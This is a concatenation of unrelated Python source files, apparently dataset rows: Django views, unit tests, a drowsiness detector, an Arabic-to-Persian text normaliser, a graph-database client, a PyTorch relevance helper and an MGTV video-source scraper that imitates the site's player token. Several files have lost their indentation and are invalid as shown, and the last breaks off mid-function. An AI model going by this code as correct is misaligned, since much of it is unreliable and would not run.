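    files = client.list_file(("demo", "master"), "/")
    return {fi.file.path: b"".join(client.get_file(("demo", "master"), fi.file.path))
            for fi in files}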
| nilq/baby-python | python |
__author__ = 'Irina.Chegodaeva'
| nilq/baby-python | python |
from django.shortcuts import render, get_object_or_404
from .models import BlogPost
def blogIndex(request):
blogposts = BlogPost.objects.order_by('-pub_date')
context = {
'heading':'The Blog',
'subheading':'',
'title':'Blog',
'copyright':'Pending',
'blogposts':blogposts,
}
return render(request,'blog-home-2.html',context)
def blogDetail(request,postid):
post = get_object_or_404(BlogPost, pk=postid)
context = {
'post' : post,
'copyright':'Pending',
}
return render(request,'blog-post.html',context) | nilq/baby-python | python |
"""Module test_listwrapper.
The MIT License
Copyright 2022 Thomas Lehmann.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
# pylint: disable=compare-to-zero,no-self-use
from unittest import TestCase
from responsive.data import make_responsive
from responsive.wrapper import ListWrapper
class ListWrapperTest(TestCase):
"""Testing class ListWrapper."""
def test_len(self):
"""Testing length of list."""
wrapper = ListWrapper([1, 2, 3, 4], make_responsive)
self.assertEqual(len(wrapper), 4)
def test_set_and_get_by_index(self):
"""Testing __setitem__ and __getitem__."""
data = [1, 2, 3, 4]
wrapper = ListWrapper([1, 2, 3, 4], make_responsive)
wrapper[2] = 9
self.assertEqual(wrapper[2], 9)
self.assertEqual(data, [1, 2, 3, 4])
def test_eq(self):
"""Testing __eq__."""
data = [1, 2, 3, 4]
wrapper = ListWrapper(data, make_responsive)
self.assertEqual(wrapper, data)
self.assertNotEqual(wrapper, 1234)
def test_iter(self):
"""Testing in and not in."""
data = [1, 2, 3, 4]
wrapper = ListWrapper(data, make_responsive)
self.assertTrue(2 in wrapper)
self.assertTrue(5 not in wrapper)
self.assertEqual(list(wrapper), data)
| nilq/baby-python | python |
import cv2
import dlib
import imutils
from imutils import face_utils
import winsound
from scipy.spatial import distance
detector=dlib.get_frontal_face_detector()
predict=dlib.shape_predictor("C:/Users/kushal asn/Downloads/shape_predictor_68_face_landmarks.dat")
def eye_aspect_ratio(Eye):
    # EAR = (|p2-p6| + |p3-p5|) / (2 * |p1-p4|); it drops toward zero as the eye closes
    A = distance.euclidean(Eye[1], Eye[5])
    B = distance.euclidean(Eye[2], Eye[4])
    C = distance.euclidean(Eye[0], Eye[3])
    ear = (A + B) / (2 * C)
    return ear
thresh=0.30
frame_rate=30
duration=1000
frequency=2500
(lstart,lend)=face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rstart,rend)=face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
cap=cv2.VideoCapture(0)
flag=0
while(True):
    ret, frame = cap.read()
    if ret:
        frame = imutils.resize(frame, width=500)
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
subjects=detector(gray,0)
for subject in subjects:
shape=predict(gray,subject)
shape=face_utils.shape_to_np(shape)
leye=shape[lstart:lend]
reye=shape[rstart:rend]
lear=eye_aspect_ratio(leye)
rear=eye_aspect_ratio(reye)
lhull=cv2.convexHull(leye)
rhull=cv2.convexHull(reye)
ear=(lear+rear)/2
if(ear<thresh):
flag+=1
print(flag)
if(flag>frame_rate):
winsound.Beep(frequency,duration)
print("drowsy alert")
else:
flag=0
cv2.imshow("Frame",frame)
if(cv2.waitKey(1)==ord("q")):
break
cv2.destroyAllWindows()
cap.release()
| nilq/baby-python | python |
import re
import cltk.corpus.persian.alphabet as alphabet
from cltk.corpus.arabic.alphabet import *
to_reform = [
{
"characters": [
HAMZA,
HAMZA_BELOW,
HAMZA_ABOVE,
HAMZA_ISOLATED,
MINI_ALEF,
SMALL_ALEF,
SMALL_WAW,
SMALL_YEH,
KASHEEDA,
FATHATAN,
DAMMATAN,
KASRATAN,
FATHA,
DAMMA,
KASRA,
SHADDA,
SUKUN,
alphabet.THOUSANDS,
alphabet.DECIMAL
],
"to_be": ""
},
{
"characters": [
ALEF_MADDA,
ALEF_WASLA,
HAMZA_BELOW_ALEF,
HAMZA_ABOVE_ALEF,
],
"to_be": alphabet.ALEF
},
{
"characters": [
ALEF_MAKSURA,
YEH,
],
"to_be": alphabet.YE
},
{
"characters": [KAF],
"to_be": alphabet.KAF
},
{
"characters": [
LAM_ALEF,
LAM_ALEF_HAMZA_ABOVE,
LAM_ALEF_HAMZA_BELOW,
LAM_ALEF_MADDA_ABOVE,
],
"to_be": alphabet.LAM + alphabet.ALEF
},
{
"characters": [TEH_MARBUTA],
"to_be": alphabet.HE2
},
]
replacementDict = {}
for rule in to_reform:
for character in rule["characters"]:
replacementDict[character] = rule["to_be"]
for originalForm, shapedForms in SHAPED_FORMS.items():
for form in shapedForms:
replacementDict[form] = replacementDict.get(originalForm, originalForm)
for i in range(10):
replacementDict[EASTERN_ARABIC_NUMERALS[i]] = alphabet.NUMERALS[i]
replacementDict[WESTERN_ARABIC_NUMERALS[i]] = alphabet.NUMERALS[i]
# Use the commented parts for Word2Vec embeddings
# replacementDict[alphabet.NUMERALS[i]] = " %s " % alphabet.NUMERALS_WRITINGS[i]
# for char in '[!"#%\'()*+,-./:;<=>?@\[\]^_`{|}~’”“′‘\\\]؟؛«»،٪':
# replacementDict[char] = " "
#
# replacementDict[" +"] = " "
replacementRegex = re.compile("(%s)" % "|".join(map(re.escape, replacementDict.keys())))
def standardize(text):
return replacementRegex.sub(lambda mo: replacementDict[mo.string[mo.start():mo.end()]], text)
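# Minimal usage sketch (exact output depends on the cltk alphabet constants
# imported above): standardize(ALEF_MADDA + TEH_MARBUTA) would yield
# alphabet.ALEF + alphabet.HE2, i.e. Arabic forms mapped onto their Persian
# equivalents, with Eastern/Western Arabic digits normalized the same way.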
| nilq/baby-python | python |
from __future__ import absolute_import, division, print_function
VERSION = '1.4.0'
def get_version():
return VERSION
__version__ = get_version()
def get_changelist():
# Legacy from the perforce era, but keeping this. It's not worth breaking
return "UnknownChangelist"
| nilq/baby-python | python |
"""
* Copyright 2019 TIBCO Software Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except
* in compliance with the License.
* A copy of the License is included in the distribution package with this file.
* You also may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File name :connectionimpl.py
* Created on: 5/15/2019
* Created by: suresh
*
* SVN Id: $Id: connectionimpl.py 3256 2019-06-10 03:31:30Z ssubrama $
*
* This file encapsulates connection interfaces
"""
from tgdb.log import *
import tgdb.log as tglog
from tgdb.utils import *
from tgdb.impl.atomics import *
import typing
import tgdb.channel as tgchannel
import tgdb.impl.channelimpl as tgchannelimpl
import tgdb.pdu as tgpdu
import tgdb.impl.pduimpl as tgpduimpl
import tgdb.connection as tgconn
import tgdb.model as tgmodel
import tgdb.impl.entityimpl as tgentimpl
import tgdb.impl.gmdimpl as tggmdimpl
import tgdb.query as tgquery
import tgdb.impl.queryimpl as tgqueryimpl
import tgdb.exception as tgexception
import tgdb.bulkio as tgbulk
import tgdb.admin as tgadm
def findCommandForLang(lang: str) -> tgquery.TGQueryCommand:
retCommand: tgquery.TGQueryCommand
if lang == "tgql":
retCommand = tgquery.TGQueryCommand.Execute
elif lang == "gremlin":
retCommand = tgquery.TGQueryCommand.ExecuteGremlinStr
elif lang == "gbc":
retCommand = tgquery.TGQueryCommand.ExecuteGremlin
else:
raise tgexception.TGException("Unknown property for ConnectionDefaultQueryLanguage: %s", lang)
return retCommand
def findCommandAndQueryString(query: str, props: tgchannel.TGProperties) -> typing.Tuple[tgquery.TGQueryCommand, str]:
lang: str = props.get(ConfigName.ConnectionDefaultQueryLanguage,
ConfigName.ConnectionDefaultQueryLanguage.defaultvalue)
retCommand: tgquery.TGQueryCommand
retStr = query
try:
idx: int = query.index("://")
prefix = query[:idx].lower()
retCommand = findCommandForLang(prefix)
retStr = query[idx + 3:]
except ValueError:
lang = lang.lower()
retCommand = findCommandForLang(lang)
return retCommand, retStr
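# Illustrative inputs (assuming default connection properties):
#   findCommandAndQueryString("gremlin://g.V()", props)
#       -> (TGQueryCommand.ExecuteGremlinStr, "g.V()")
#   findCommandAndQueryString("g.V()", props)   # no "<lang>://" prefix
#       -> command taken from ConnectionDefaultQueryLanguage, query unchanged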
class ConnectionImpl(tgconn.TGConnection):
def __init__(self, url, username, password, dbName: typing.Optional[str], env):
self.__url__ = url
self.__username__ = username
self.__password__ = password
self.__props__: TGProperties = TGProperties(env)
self._dbName = dbName
self.__channel__: tgchannel.TGChannel = tgchannel.TGChannel.createChannel(url, username, password, dbName,
self.__props__)
self.__props__.update(tgchannelimpl.LinkUrl.parse(url).properties)
self.__gof__: tggmdimpl.GraphObjectFactoryImpl = tggmdimpl.GraphObjectFactoryImpl(self)
self.__addEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__updateEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__removeEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__requestIds__ = AtomicReference('i', 0)
def _genBCRWaiter(self) -> tgchannelimpl.BlockingChannelResponseWaiter:
timeout = self.__props__.get(ConfigName.ConnectionOperationTimeoutSeconds, None)
if timeout is not None and isinstance(timeout, str):
timeout = float(timeout)
requestId = self.__requestIds__.increment()
return tgchannelimpl.BlockingChannelResponseWaiter(requestId, timeout)
def connect(self):
tglog.gLogger.log(tglog.TGLevel.Debug, "Attempting to connect")
self.__channel__.connect()
tglog.gLogger.log(tglog.TGLevel.Debug, "Connected, now logging in.")
self.__channel__.start()
tglog.gLogger.log(tglog.TGLevel.Debug, "Logged in, now acquiring metadata.")
self.__initMetadata__()
tglog.gLogger.log(tglog.TGLevel.Debug, "Acquired metadata, now sending connection properties.")
self.__sendConnectionProperties()
tglog.gLogger.log(tglog.TGLevel.Debug, 'Connected successfully')
def __initMetadata__(self):
waiter = self._genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.MetadataRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response = self.__channel__.send(request, waiter)
if response.verbid != tgpdu.VerbId.MetadataResponse:
raise tgexception.TGException('Invalid response object received')
self.__gof__.graphmetadata.registry = response.typeregistry
def disconnect(self):
self.__channel__.disconnect()
self.__channel__.stop()
def commit(self):
channelResponse = self._genBCRWaiter()
try:
if gLogger.level is TGLevel.Debug:
def echoAttributes(ent: tgmodel.TGEntity):
                    gLogger.log(TGLevel.Debug, "Entity ID: %d", ent.virtualId)
                    attr: tgmodel.TGAttribute
                    for attr in ent.attributes:
                        gLogger.log(TGLevel.Debug, "    Attribute: %s", attr._value)
[echoAttributes(ent) for ent in self.__addEntities__.values()]
[echoAttributes(ent) for ent in self.__updateEntities__.values()]
[echoAttributes(ent) for ent in self.__removeEntities__.values()]
request: tgpduimpl.CommitTransactionRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.CommitTransactionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
attrDescSet = self.graphObjectFactory.graphmetadata.attritubeDescriptors
request.addCommitList(self.__addEntities__, self.__updateEntities__, self.__removeEntities__, attrDescSet)
response: tgpduimpl.CommitTransactionResponseMessage = self.__channel__.send(request, channelResponse)
if response.exception is not None:
raise response.exception
response.finishReadWith(self.__addEntities__, self.__updateEntities__, self.__removeEntities__,
self.__gof__.graphmetadata.registry)
for id in self.__removeEntities__:
self.__removeEntities__[id].markDeleted()
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, "Transaction commit succeeded")
except IOError as e:
raise tgexception.TGException.buildException("IO Error", cause=e)
finally:
for id in self.__addEntities__:
self.__addEntities__[id].resetModifiedAttributes()
for id in self.__updateEntities__:
self.__updateEntities__[id].resetModifiedAttributes()
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def refreshMetadata(self):
self.__initMetadata__()
def rollback(self):
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def __sendConnectionProperties(self):
request: tgpduimpl.ConnectionPropertiesMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.ConnectionPropertiesMessage, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.props = self.__channel__.properties
self.__channel__.send(request)
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startImport(self, loadopt: typing.Union[str, tgbulk.TGLoadOptions] = tgbulk.TGLoadOptions.Insert,
erroropt: typing.Union[str, tgbulk.TGErrorOptions] = tgbulk.TGErrorOptions.Stop,
dateformat: typing.Union[str, tgbulk.TGDateFormat] = tgbulk.TGDateFormat.YMD,
props: typing.Optional[TGProperties] = None):
import tgdb.impl.bulkioimpl as tgbulkimpl
ret: tgbulkimpl.BulkImportImpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginImportSessionRequest
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
        if isinstance(loadopt, str):
            loadopt = tgbulk.TGLoadOptions.findVal(loadopt)
if loadopt == tgbulk.TGLoadOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid load option!")
if isinstance(erroropt, str):
erroropt = tgbulk.TGErrorOptions.findVal(erroropt)
if erroropt == tgbulk.TGErrorOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid error option!")
if isinstance(dateformat, str):
dateformat = tgbulk.TGDateFormat.findVal(dateformat)
if dateformat == tgbulk.TGDateFormat.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid Date-Time Format!")
request.loadopt = loadopt
request.erroropt = erroropt
request.dtformat = dateformat
response: tgpduimpl.BeginImportSessionResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
ret = tgbulkimpl.BulkImportImpl(self, props)
return ret
def partialImportEntity(self, entType: tgmodel.TGEntityType, reqIdx: int, totReqs: int, data: str,
attrList: typing.List[str]) -> typing.List[tgadm.TGImportDescriptor]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialImportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.type = entType
request.reqIdx = reqIdx
request.totalRequestsForType = totReqs
request.data = data
request.attrList = attrList
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return response.resultList
def endBulkImport(self):
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.EndBulkImportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.resultList
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startExport(self, props: typing.Optional[TGProperties] = None, zip: typing.Optional[str] = None,
isBatch: bool = True):
import tgdb.impl.bulkioimpl as tgbulkimpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginExportRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.zipName = zip
request.isBatch = isBatch
request.maxBatchEntities = int(ConfigName.BulkIOEntityBatchSize.defaultvalue)\
if props is None or props[ConfigName.BulkIOEntityBatchSize] is None else\
int(props[ConfigName.BulkIOEntityBatchSize])
response: tgpduimpl.BeginExportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return tgbulkimpl.BulkExportImpl(self, props, response.typeList, response.numRequests)
def partialExport(self, reqNum: int) -> typing.Tuple[str, bytes, bool, int,
typing.Optional[typing.Tuple[str, typing.List[str]]]]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialExportRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.requestNum = reqNum
response: tgpduimpl.PartialExportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.fileName, response.data, response.hasMore, response.numEntities,\
(response.typeName, response.attrList) if response.newType else None
"""
def startExport(self, props: Optional[TGProperties] = None) -> tgbulk.TGBulkExport:
channelResponseWaiter = self.__genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginBulkExportSessionRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
return tgbulkimpl.BulkExportImpl(self, props)
def beginBatchExportEntity(self, entkind: tgmodel.TGEntityKind, enttype: tgmodel.TGEntityType, batchSize: int) \
-> Tuple[int, List[str]]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.BeginBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.entKind = entkind
request.entType = enttype
request.batchSize = batchSize
response: tgpduimpl.BeginBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.descriptor, response.columnLabels
def singleBatchExportEntity(self, desc: int) -> Tuple[int, str, bool]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.SingleBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.SingleBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.descriptor = desc
response: tgpduimpl.SingleBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.numEnts, response.data, response.hasMore
def endBulkExportSession(self):
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.EndBulkExportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndBulkExportSessionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def getEntity(self, key: tgmodel.TGKey, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) ->\
tgmodel.TGEntity:
channelResponseWaiter = self._genBCRWaiter()
requestMessage: tgpduimpl.GetEntityRequestMessage
retV: tgmodel.TGEntity = None
try:
requestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.GetEntityRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
requestMessage.command = tgpduimpl.GetEntityCommand.GetEntity
requestMessage.key = key
response: tgpduimpl.GetEntityResponseMessage = self.__channel__.send(requestMessage, channelResponseWaiter)
if response.hasResult:
response.finishReadWith(self.graphObjectFactory)
fetchedEntities = response.fetchedEntities
for id in fetchedEntities:
fetchedEnt: tgmodel.TGEntity = fetchedEntities[id]
if key.matches(fetchedEnt):
retV = fetchedEnt
break
finally:
pass
return retV
def insertEntity(self, entity: tgmodel.TGEntity):
if not entity.isNew:
raise tgexception.TGException("Should only be calling insertEntity on a new entity!")
if entity.virtualId not in self.__removeEntities__:
self.__addEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, 'Insert entity called')
def updateEntity(self, entity: tgmodel.TGEntity):
if entity.isNew:
raise tgexception.TGException('Should not be calling update on a new entity!')
if entity.isDeleted:
raise tgexception.TGException('Should not be calling update on an already deleted entity!')
if entity.virtualId not in self.__removeEntities__:
self.__updateEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def __updateEdge__(self, entity: tgmodel.TGEntity):
if isinstance(entity, tgentimpl.EdgeImpl):
edge: tgmodel.TGEdge = entity
fr, to = edge.vertices
if not fr.isNew and fr.virtualId not in self.__removeEntities__:
self.__updateEntities__[fr.virtualId] = fr
if not to.isNew and to.virtualId not in self.__removeEntities__:
self.__updateEntities__[to.virtualId] = to
def deleteEntity(self, entity: tgentimpl.AbstractEntity):
if entity.isDeleted:
raise tgexception.TGException('Should not be calling delete on an already deleted entity!')
# Remove any entities added to the add changelist
if entity.virtualId in self.__addEntities__:
del self.__addEntities__[entity.virtualId]
# Remove any entities added to the update changelist
if entity.virtualId in self.__updateEntities__:
del self.__updateEntities__[entity.virtualId]
if entity.isNew:
entity.markDeleted()
else:
self.__removeEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def createQuery(self, query: str) -> tgquery.TGQuery:
channelResponseWaiter: tgchannel.TGChannelResponseWaiter
result: int
ret: tgquery.TGQuery = None
channelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Create
request.query = query
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
gLogger.log(TGLevel.Debug, "Send query completed")
result: int = response.result
queryHashId: int = response.queryHashId
if result == 0 and queryHashId > 0: #TODO Create error reporting for query result.
ret = tgqueryimpl.QueryImpl(self, queryHashId)
finally:
pass
return ret
def executeQuery(self, query: typing.Optional[str] = None,
option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) -> tgquery.TGResultSet:
if query is None:
try:
query = option.queryExpr
except KeyError as e:
raise tgexception.TGException("Need to specify a query string!", cause=e)
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
result: int
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.option = option
request.command, request.query = findCommandAndQueryString(query, self.__props__)
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return response.finishReadWith(request.command, self.__gof__)
except (Exception, tgexception.TGException):
raise
# TODO implement some form of compiled queries
def executeQueryWithId(self, queryId: int, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) -> \
tgquery.TGResultSet:
result: int
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.ExecuteID
request.queryHashId = queryId
request.option = option
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
return response.finishReadWith(tgquery.TGQueryCommand.ExecuteID, self.__gof__)
except Exception as e:
raise tgexception.TGException("Exception in executeQueryWithId", cause=e)
def closeQuery(self, queryId: int):
channelResponseWaiter: tgchannel.TGChannelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Close
request.queryHashId = queryId
_: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
# TODO check response state
gLogger.log(TGLevel.Debug, "Send close query completed")
except Exception as e:
raise tgexception.TGException("Exception in closeQuery", cause=e)
def getLargeObjectAsBytes(self, entityId: int, encrypted: bool = False) -> bytes:
channelResponseWaiter = self._genBCRWaiter()
if encrypted: # TODO Decrypt encrypted entities
raise tgexception.TGProtocolNotSupported("Blob/Clob encryption/decryption not implemented.")
request: tgpduimpl.GetLargeObjectRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.GetLargeObjectRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.entityId = entityId
request.decrypt = encrypted
response: tgpduimpl.GetLargeObjectResponseMessage = self.__channel__.send(request, channelResponseWaiter)
if entityId != response.entityId:
raise tgexception.TGException("Server responded with different entityId than expected!")
data = bytes() if response.data is None else response.data
return data
@property
def linkState(self) -> tgchannel.LinkState:
return self.__channel__.linkstate
@property
def outboxaddr(self) -> str:
return self.__channel__.outboxaddr
@property
def connectedUsername(self) -> str:
return self.__username__
@property
def graphMetadata(self) -> tgmodel.TGGraphMetadata:
return self.__gof__.graphmetadata
@property
def graphObjectFactory(self) -> tgmodel.TGGraphObjectFactory:
return self.__gof__
| nilq/baby-python | python |
import base64
import requests
import uuid
import time
class MGTV:
def __init__(self, url):
self.url = url
def get_video_id(self):
return self.url.split("/", 5)[-1].split(".")[0]
def get_pm2(self):
did = "e6e13014-393b-43e7-b6be-2323e4960939"
suuid = uuid.uuid4()
pno = "1030"
# tk2 = self.encode_tk2(did, pno)
params = {
"did": did,
"suuid": suuid,
"cxid": "",
"tk2": self.encode_tk2(did, pno),
"type": "pch5",
"video_id": self.get_video_id(),
"_support": "10000000",
"auth_mode": "1",
"src": "",
"abroad": "",
}
res = requests.get("https://pcweb.api.mgtv.com/player/video", params=params).json()
return res['data']['atc']['pm2']
def encode_tk2(self, did="e6e13014-393b-43e7-b6be-2323e4960939", pno="1030"):
        tk2 = f"did={did}|pno={pno}|ver=0.3.0301|clit={int(time.time())}".encode()
        # str.replace() takes literal substrings; the JS-style regex patterns
        # ("/\+/g" etc.) in the original never matched anything in Python.
        tk2 = base64.b64encode(tk2).decode().replace("+", "_").replace("/", "~").replace("=", "-")
        return "".join(reversed(tk2))
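    # encode_tk2 therefore returns the URL-safe base64 of
    # "did=...|pno=1030|ver=0.3.0301|clit=<unix time>" written backwards,
    # which is what the mgtv web player sends as its "tk2" token.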
def start(self):
params = {
"_support": "10000000",
"tk2": self.encode_tk2(),
"pm2": self.get_pm2(),
"video_id": self.get_video_id(),
"type": "pch5",
"auth_mode": "1",
"src": "",
"abroad": "",
}
res = requests.get("https://pcweb.api.mgtv.com/player/getSource", params=params).json()
print(res)
return res
if __name__ == '__main__':
    # MGTV() requires the video page URL; the one below is a placeholder.
    MGTV("https://www.mgtv.com/b/<album_id>/<video_id>.html").start()
| nilq/baby-python | python |
import copy
import pickle
import torch
import types
from . import layers
from . import rules
Rules = rules.Rules
def flatten_model(module):
'''
flatten modul to base operation like Conv2, Linear, ...
'''
modules_list = []
for m_1 in module.children():
if len(list(m_1.children())) == 0:
modules_list.append(m_1)
else:
modules_list = modules_list + flatten_model(m_1)
return modules_list
def copy_module(module):
'''
sometimes copy.deepcopy() does not work
'''
    module = copy.deepcopy(pickle.loads(pickle.dumps(module)))
    module._forward_hooks.clear()  # remove all hooks from the module copy
    module._backward_hooks.clear()  # popitem() raised KeyError when no hooks were registered
return module
def redefine_nn(model, rule, input_lowest, input_highest):
'''
go over model layers and overload chosen instance methods (e.g. forward()).
New methods come from classes of layers module
'''
rule_func = Rules(rule)
list_of_layers = dir(layers) #list of redefined layers in layers module
for num, module in enumerate(flatten_model(model)):
if module.__class__.__name__ in list_of_layers:
local_class = module.__class__ #current layer class
layer_module_class = layers.__getattr__(local_class.__name__) # get same redefined layer class
list_of_methods = [attr for attr in dir(layer_module_class) if attr[:2] != '__'] #methods which was redefined
for l in list_of_methods:
#overload object method from https://stackoverflow.com/questions/394770/override-a-method-at-instance-level
setattr(module, l, types.MethodType(getattr(layer_module_class, l), module)) #set redefined methods to object
if num == 0:
setattr(module, 'rule_func', Rules('z_box_no_bias', lowest=input_lowest, highest=input_highest)) #first layer always z_box
else:
setattr(module, 'rule_func', rule_func)
return model
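# Usage sketch (rule names are whatever rules.Rules accepts; 'z_box_no_bias'
# is the only one visible here):
#   model = redefine_nn(model, rule=some_rule, input_lowest=0.0, input_highest=1.0)
# after which every forward pass runs through the overloaded layer methods.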
| nilq/baby-python | python |
import pytest
import os
from tddc import common
def test_get_base_filename():
assert common.get_base_filename('/Users/foo/bar.txt') == 'bar'
assert common.get_base_filename('bar.txt') == 'bar'
assert common.get_base_filename('bar') == 'bar'
assert common.get_base_filename('bar.txt.gz') == 'bar.txt'
def test_write_summary(tmpdir):
